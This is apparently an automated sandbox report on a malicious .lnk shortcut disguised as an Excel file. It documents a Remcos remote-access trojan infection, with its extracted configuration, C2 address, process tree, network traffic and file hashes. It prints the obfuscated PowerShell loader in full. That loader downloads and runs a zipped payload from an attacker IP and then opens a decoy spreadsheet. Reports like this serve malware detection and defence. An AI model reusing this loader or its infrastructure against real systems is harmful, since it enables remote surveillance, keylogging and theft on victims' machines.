Analysis

  • max time kernel
    148s
  • max time network
    136s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20240802-en
  • resource tags

    arch:x64 arch:x86 image:win10v2004-20240802-en locale:en-us os:windows10-2004-x64 system
  • submitted
    07-09-2024 01:16

General

  • Target

    rv_luti_2024_roku.xlsx.lnk

  • Size

    32KB

  • MD5

    bbcc000caf3fff5b3025da99cff2aa45

  • SHA1

    89a89db57a5b286b16d8d0a82903a4f256584bb5

  • SHA256

    3e5adec34d0e3567b3eed2c917eaac783ff3eb19c2a1154339ebd1b2497f1e24

  • SHA512

    1eecf2183c2909e642904dc023256b8f1437a25d59c541afa53b6eff4c9f727ef1fcdc3a7507f94e5d75ba490263c5a0fa2be95a1cfc4734a07a874d4bba56e1

  • SSDEEP

    48:88muavUQSSE1I3fxvUZ7sEmOxCCevUZ731EdCZFXuGdZTa7x:88y8EE1YfxHERxCVybuKQ

Malware Config

Extracted

Family

remcos

Botnet

stalagg

C2

5.181.156.117:8576

Attributes
  • audio_folder

    MicRecords

  • audio_record_time

    5

  • connect_delay

    0

  • connect_interval

    1

  • copy_file

    remcos.exe

  • copy_folder

    Remcos

  • delete_file

    false

  • hide_file

    false

  • hide_keylog_file

    false

  • install_flag

    false

  • keylog_crypt

    false

  • keylog_file

    logs.dat

  • keylog_flag

    false

  • keylog_folder

    remcos

  • mouse_option

    false

  • mutex

    Rmc-5TL39W

  • screenshot_crypt

    false

  • screenshot_flag

    false

  • screenshot_folder

    Screenshots

  • screenshot_path

    %AppData%

  • screenshot_time

    10

  • take_screenshot_option

    false

  • take_screenshot_time

    5

Signatures

  • Remcos

    Remcos is a closed-source remote control and surveillance software.

  • Blocklisted process makes network request 1 IoCs
  • Checks computer location settings 2 TTPs 1 IoCs

    Looks up the country code configured in the registry, likely for geofencing.

  • Executes dropped EXE 2 IoCs
  • Loads dropped DLL 2 IoCs
  • Suspicious use of SetThreadContext 1 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • System Location Discovery: System Language Discovery 1 TTPs 4 IoCs

    Attempts to gather information about the system language of a victim in order to infer the geographical location of that host.

  • Checks processor information in registry 2 TTPs 3 IoCs

    Processor information is often read in order to detect sandboxing environments.

  • Enumerates system info in registry 2 TTPs 3 IoCs
  • Modifies registry class 1 IoCs
  • Suspicious behavior: AddClipboardFormatListener 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 7 IoCs
  • Suspicious behavior: MapViewOfSection 2 IoCs
  • Suspicious use of AdjustPrivilegeToken 1 IoCs
  • Suspicious use of SetWindowsHookEx 12 IoCs
  • Suspicious use of WriteProcessMemory 22 IoCs

Processes

  • C:\Windows\system32\cmd.exe
    cmd /c C:\Users\Admin\AppData\Local\Temp\rv_luti_2024_roku.xlsx.lnk
    1⤵
    • Checks computer location settings
    • Suspicious use of WriteProcessMemory
    PID:1700
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -win 1 echo mDDkSKPeKSnmyhDKrRrfgmsmeF; echo anUGxZjKUCNgLKMBbyEjctOscTtBFAQROSENvflIdGfTRJUxVqfCL; echo ykxRyjMJeSrZAgkrYWGta; if (-not(Test-Path 'glorytoukraine.zip' -PathType Leaf)){&(G''et-C''om''ma''nd in???e-webr**) -uri h''t''t''p'':''/''/''5''.''18''1''.''1''56''.''117''/glorytoukraine.zip -OutFile glorytoukraine.zip}; echo EMNQacYrNXHyebrpmkIKUbKIwHYVxkqDyqbnvplWDcpbb; Expand-Archive -Path glorytoukraine.zip -DestinationPath SecurityCheck; s''tar''t SecurityCheck/scr_previw.exe; echo XbwVjPDNPkbnuGZQfsRvcJknOPJXCFbqSFCKR; &(Ge''t-Com''ma''nd in???e-webre***) -uri h''t''t''p'':''/''/''5''.''18''1''.''1''56''.''117''/racs/rv_luti_2024_roku.xlsx -OutFile rv_luti_2024_roku.xlsx; echo zqCIRBDMssIzkDEUagHLMaYQOxVloBQv; s''t''a''rt rv_luti_2024_roku.xlsx
      2⤵
      • Blocklisted process makes network request
      • Modifies registry class
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      • Suspicious use of WriteProcessMemory
      PID:4936
      • C:\Users\Admin\AppData\Roaming\SecurityCheck\scr_previw.exe
        "C:\Users\Admin\AppData\Roaming\SecurityCheck\scr_previw.exe"
        3⤵
        • Executes dropped EXE
        • Loads dropped DLL
        • System Location Discovery: System Language Discovery
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of WriteProcessMemory
        PID:3776
        • C:\Users\Admin\AppData\Roaming\SuperSync_test\scr_previw.exe
          C:\Users\Admin\AppData\Roaming\SuperSync_test\scr_previw.exe
          4⤵
          • Executes dropped EXE
          • Loads dropped DLL
          • Suspicious use of SetThreadContext
          • System Location Discovery: System Language Discovery
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious behavior: MapViewOfSection
          • Suspicious use of WriteProcessMemory
          PID:1824
          • C:\Windows\SysWOW64\cmd.exe
            C:\Windows\SysWOW64\cmd.exe
            5⤵
            • System Location Discovery: System Language Discovery
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious behavior: MapViewOfSection
            • Suspicious use of WriteProcessMemory
            PID:2848
            • C:\Windows\SysWOW64\explorer.exe
              C:\Windows\SysWOW64\explorer.exe
              6⤵
              • System Location Discovery: System Language Discovery
              PID:1320
      • C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE
        "C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE" "C:\Users\Admin\AppData\Roaming\rv_luti_2024_roku.xlsx"
        3⤵
        • Checks processor information in registry
        • Enumerates system info in registry
        • Suspicious behavior: AddClipboardFormatListener
        • Suspicious use of SetWindowsHookEx
        • Suspicious use of WriteProcessMemory
        PID:3272
        • C:\Windows\splwow64.exe
          C:\Windows\splwow64.exe 12288
          4⤵
            PID:4044
    • C:\Windows\system32\svchost.exe
      C:\Windows\system32\svchost.exe -k PrintWorkflow -s PrintWorkflowUserSvc
      1⤵
        PID:3008

      Network

      • flag-md
        GET
        http://5.181.156.117/glorytoukraine.zip
        powershell.exe
        Remote address:
        5.181.156.117:80
        Request
        GET /glorytoukraine.zip HTTP/1.1
        User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1237
        Host: 5.181.156.117
        Connection: Keep-Alive
        Response
        HTTP/1.1 200 OK
        Date: Sat, 07 Sep 2024 01:16:42 GMT
        Server: Apache/2.4.52 (Ubuntu)
        Last-Modified: Wed, 28 Aug 2024 15:21:08 GMT
        ETag: "2e931b-620bfe845e100"
        Accept-Ranges: bytes
        Content-Length: 3052315
        Keep-Alive: timeout=5, max=100
        Connection: Keep-Alive
        Content-Type: application/zip
      • flag-md
        GET
        http://5.181.156.117/racs/rv_luti_2024_roku.xlsx
        powershell.exe
        Remote address:
        5.181.156.117:80
        Request
        GET /racs/rv_luti_2024_roku.xlsx HTTP/1.1
        User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1237
        Host: 5.181.156.117
        Response
        HTTP/1.1 200 OK
        Date: Sat, 07 Sep 2024 01:18:09 GMT
        Server: Apache/2.4.52 (Ubuntu)
        Last-Modified: Wed, 24 Jul 2024 21:02:48 GMT
        ETag: "8201-61e0499b8ee00"
        Accept-Ranges: bytes
        Content-Length: 33281
        Content-Type: application/vnd.openxmlformats-officedocument.spreadsheetml.sheet
      • flag-us
        DNS
        117.156.181.5.in-addr.arpa
        Remote address:
        8.8.8.8:53
        Request
        117.156.181.5.in-addr.arpa
        IN PTR
        Response
        117.156.181.5.in-addr.arpa
        IN PTR
        no-rdns.mivocloud.com
      • flag-us
        DNS
        217.106.137.52.in-addr.arpa
        Remote address:
        8.8.8.8:53
        Request
        217.106.137.52.in-addr.arpa
        IN PTR
        Response
      • flag-us
        DNS
        172.214.232.199.in-addr.arpa
        Remote address:
        8.8.8.8:53
        Request
        172.214.232.199.in-addr.arpa
        IN PTR
        Response
      • flag-us
        DNS
        23.159.190.20.in-addr.arpa
        Remote address:
        8.8.8.8:53
        Request
        23.159.190.20.in-addr.arpa
        IN PTR
        Response
      • flag-us
        DNS
        95.221.229.192.in-addr.arpa
        Remote address:
        8.8.8.8:53
        Request
        95.221.229.192.in-addr.arpa
        IN PTR
        Response
      • flag-us
        DNS
        28.118.140.52.in-addr.arpa
        Remote address:
        8.8.8.8:53
        Request
        28.118.140.52.in-addr.arpa
        IN PTR
        Response
      • flag-us
        DNS
        183.59.114.20.in-addr.arpa
        Remote address:
        8.8.8.8:53
        Request
        183.59.114.20.in-addr.arpa
        IN PTR
        Response
      • flag-us
        DNS
        228.249.119.40.in-addr.arpa
        Remote address:
        8.8.8.8:53
        Request
        228.249.119.40.in-addr.arpa
        IN PTR
        Response
      • flag-us
        DNS
        56.126.166.20.in-addr.arpa
        Remote address:
        8.8.8.8:53
        Request
        56.126.166.20.in-addr.arpa
        IN PTR
        Response
      • flag-us
        DNS
        13.86.106.20.in-addr.arpa
        Remote address:
        8.8.8.8:53
        Request
        13.86.106.20.in-addr.arpa
        IN PTR
        Response
      • flag-us
        DNS
        43.229.111.52.in-addr.arpa
        Remote address:
        8.8.8.8:53
        Request
        43.229.111.52.in-addr.arpa
        IN PTR
        Response
      • flag-us
        DNS
        roaming.officeapps.live.com
        EXCEL.EXE
        Remote address:
        8.8.8.8:53
        Request
        roaming.officeapps.live.com
        IN A
        Response
        roaming.officeapps.live.com
        IN CNAME
        prod.roaming1.live.com.akadns.net
        prod.roaming1.live.com.akadns.net
        IN CNAME
        eur.roaming1.live.com.akadns.net
        eur.roaming1.live.com.akadns.net
        IN CNAME
        weu-azsc-000.roaming.officeapps.live.com
        weu-azsc-000.roaming.officeapps.live.com
        IN CNAME
        osiprod-weu-buff-azsc-000.westeurope.cloudapp.azure.com
        osiprod-weu-buff-azsc-000.westeurope.cloudapp.azure.com
        IN A
        52.109.89.19
      • flag-nl
        POST
        https://roaming.officeapps.live.com/rs/RoamingSoapService.svc
        EXCEL.EXE
        Remote address:
        52.109.89.19:443
        Request
        POST /rs/RoamingSoapService.svc HTTP/1.1
        Cache-Control: no-cache
        Connection: Keep-Alive
        Pragma: no-cache
        Content-Type: text/xml; charset=utf-8
        User-Agent: MS-WebServices/1.0
        SOAPAction: "http://tempuri.org/IRoamingSettingsService/GetConfig"
        Content-Length: 511
        Host: roaming.officeapps.live.com
        Response
        HTTP/1.1 200 OK
        Cache-Control: private
        Content-Type: text/xml; charset=utf-8
        Server: Microsoft-IIS/10.0
        X-OfficeFE: RoamingFE_IN_81
        X-OfficeVersion: 16.0.18025.30575
        X-OfficeCluster: weu-000.roaming.officeapps.live.com
        X-CorrelationId: 10c3167c-5fa8-43a2-b5c3-bd87dc577041
        X-Powered-By: ASP.NET
        Date: Sat, 07 Sep 2024 01:18:11 GMT
        Content-Length: 654
      • flag-us
        DNS
        97.32.109.52.in-addr.arpa
        Remote address:
        8.8.8.8:53
        Request
        97.32.109.52.in-addr.arpa
        IN PTR
        Response
      • flag-us
        DNS
        19.89.109.52.in-addr.arpa
        Remote address:
        8.8.8.8:53
        Request
        19.89.109.52.in-addr.arpa
        IN PTR
        Response
      • flag-us
        DNS
        240.143.123.92.in-addr.arpa
        Remote address:
        8.8.8.8:53
        Request
        240.143.123.92.in-addr.arpa
        IN PTR
        Response
        240.143.123.92.in-addr.arpa
        IN PTR
        a92-123-143-240.deploy.static.akamaitechnologies.com
      • flag-us
        DNS
        22.160.190.20.in-addr.arpa
        Remote address:
        8.8.8.8:53
        Request
        22.160.190.20.in-addr.arpa
        IN PTR
        Response
      • flag-us
        DNS
        130.109.69.13.in-addr.arpa
        Remote address:
        8.8.8.8:53
        Request
        130.109.69.13.in-addr.arpa
        IN PTR
        Response
      • 5.181.156.117:80
        http://5.181.156.117/racs/rv_luti_2024_roku.xlsx
        http
        powershell.exe
        67.4kB
        3.2MB
        1406
        2278

        HTTP Request

        GET http://5.181.156.117/glorytoukraine.zip

        HTTP Response

        200

        HTTP Request

        GET http://5.181.156.117/racs/rv_luti_2024_roku.xlsx

        HTTP Response

        200
      • 52.109.89.19:443
        https://roaming.officeapps.live.com/rs/RoamingSoapService.svc
        tls, http
        EXCEL.EXE
        1.7kB
        7.7kB
        11
        10

        HTTP Request

        POST https://roaming.officeapps.live.com/rs/RoamingSoapService.svc

        HTTP Response

        200
      • 5.181.156.117:8576
        tls
        explorer.exe
        1.9kB
        1.2kB
        10
        10

      MITRE ATT&CK Enterprise v15

      Downloads

      • C:\Users\Admin\AppData\Local\Temp\79fefd29

        Filesize

        1.2MB

        MD5

        914f7b7fca3ff7756b87850df76f06fc

        SHA1

        4a15cd5440581655fb64f4ae79510e1dcdf8caa9

        SHA256

        d61a27f86dfc47b06ad3887d976fe90e5b1f9b438fa25701a4a2e5021b0aba97

        SHA512

        7a7817f7bb3f0445bd9350ad0a6d44db7910a8e0640a1dacf95162d511097cf573ff076a0d118bcdd5b4400a90ac922933ccb7c5baa48efe38a74d1aa2b93d81

      • C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_nhyug3sx.0nb.ps1

        Filesize

        60B

        MD5

        d17fe0a3f47be24a6453e9ef58c94641

        SHA1

        6ab83620379fc69f80c0242105ddffd7d98d5d9d

        SHA256

        96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

        SHA512

        5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

      • C:\Users\Admin\AppData\Roaming\Microsoft\Office\Recent\index.dat

        Filesize

        354B

        MD5

        6e2e415b1ffecd0ea0742a4e135d03ab

        SHA1

        571da1a3d40675a314b1373eadbdcc439fb99e99

        SHA256

        44d80996b6ba4f95430af2569b2c1763e18044d8d2fddbbcd0b7dcad611be647

        SHA512

        c2508a721fb8d4b096326639da50834d093cd18254f1f13f0163846efc23c458fde3740c45c19ecd5a35b2d823f62077c11a878efc0148543c52f4f549c02a18

      • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\b8ab77100df80ab2.customDestinations-ms

        Filesize

        2KB

        MD5

        eebb581ed27d3d4dc8163f6bd366b30b

        SHA1

        d9f18637615c371b54f25ec7f2ebc9d3c3d2fa6e

        SHA256

        d5b04157079d7aac198e8ed4e6ae37e689fcc58129fb4349897390271464d4b6

        SHA512

        2ac6ce164d79e53395a1404326edbd4019b0f6448e555782ffeff398a842c5e5eb7f7fc6848398f7cfa3bc3ce5b07ddda670a46cbbe0c75d46eed874b5af98f7

      • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\b8ab77100df80ab2.customDestinations-ms

        Filesize

        1KB

        MD5

        e623ae6fa6306ad3a1de71f7f0b73ea3

        SHA1

        193077f845a08d18510509b690acd20054af810f

        SHA256

        73410e4f554da3a0e83ab357bd336295f61f807be282ffb5d137250aa31309be

        SHA512

        32db7b4ddaf644f87ee9a5fda322fea8d7a3ccb1fa02627d53d71dd9fad6efa5ebfa8a22b830a1f0712d7df059939f7edea1fe791214f06466be907b39e81a7e

      • C:\Users\Admin\AppData\Roaming\SecurityCheck\d3dx9_43.dll

        Filesize

        1.9MB

        MD5

        46e435aecb557fcb16ae2ea3b22ab7fd

        SHA1

        5290156599fd9575c4401c80949ad5672fe64da5

        SHA256

        70e0b720bb461503acbd947a8355fb629d703b8d7f99ddfbb09a0c71886861da

        SHA512

        621010aa44868062361c6dbb670f8664c370ddcb0afbb5835765470522c03bb5ac779e86236cfffdcf343cbc582f81beacd2a7108d78c90d4dfc4c38e7d23bb3

      • C:\Users\Admin\AppData\Roaming\SecurityCheck\rnyt

        Filesize

        1.0MB

        MD5

        289d2d639e058b63ebe16bd8d543115d

        SHA1

        969736e5f6a2c416f556e2f73358020573486afc

        SHA256

        f21bf56c8d15824dc1cf4108725f73154b88a89ab23f00a7f8dbb2d2de8e2568

        SHA512

        7adf83c9795d9705c4c1345422d17ad26b6d4f27a8242674f44b2d2a05080e532d9a64c43803164bf25c4e9eb5cac7a0d3789d71e9f34b46b5b9c6203fad65aa

      • C:\Users\Admin\AppData\Roaming\SecurityCheck\scr_previw.exe

        Filesize

        2.2MB

        MD5

        d9530ecee42acccfd3871672a511bc9e

        SHA1

        89b4d2406f1294bd699ef231a4def5f495f12778

        SHA256

        81e04f9a131534acc0e9de08718c062d3d74c80c7f168ec7e699cd4b2bd0f280

        SHA512

        d5f048ea995affdf9893ec4c5ac5eb188b6714f5b6712e0b5a316702033421b145b8ee6a62d303eb4576bf8f57273ff35c5d675807563a31157136f79d8a9980

      • C:\Users\Admin\AppData\Roaming\SecurityCheck\tkjm

        Filesize

        80KB

        MD5

        cae9827c507632c4a1980479c21a42a2

        SHA1

        d9a1c5900a93066645bf8fb7c79dacf56f3eaa3e

        SHA256

        efeec4c2f612130ec81f3796bba26471e14dcf97b0e22247b7c7f40ad2eba0cf

        SHA512

        441fb631ed26bfe5b84c4fd267a43fbacc64e0adae0e90d0d8e11a248fa2ab47d43a54f1cc3903532943d158d87a2e236976830834545b0d13471731b6f61768

      • C:\Users\Admin\AppData\Roaming\rv_luti_2024_roku.xlsx

        Filesize

        32KB

        MD5

        21046015d5d9ef5e536ac7643b1ab365

        SHA1

        f3bcd22d8e9b5ad1c2e17b42d5684421b2ddfb05

        SHA256

        7a94cedcc9624dbe8eb4ad818fbaf2a53f9ca0fe2ff28b3000a597e034b520bd

        SHA512

        d63030de97a378e9bb73ce53f589c75f1da9e6fb3998da02680a9396b75ebf6773119d61e5663c007379c85413a8d023e1df2323038314d357ac64bd770b9c9e

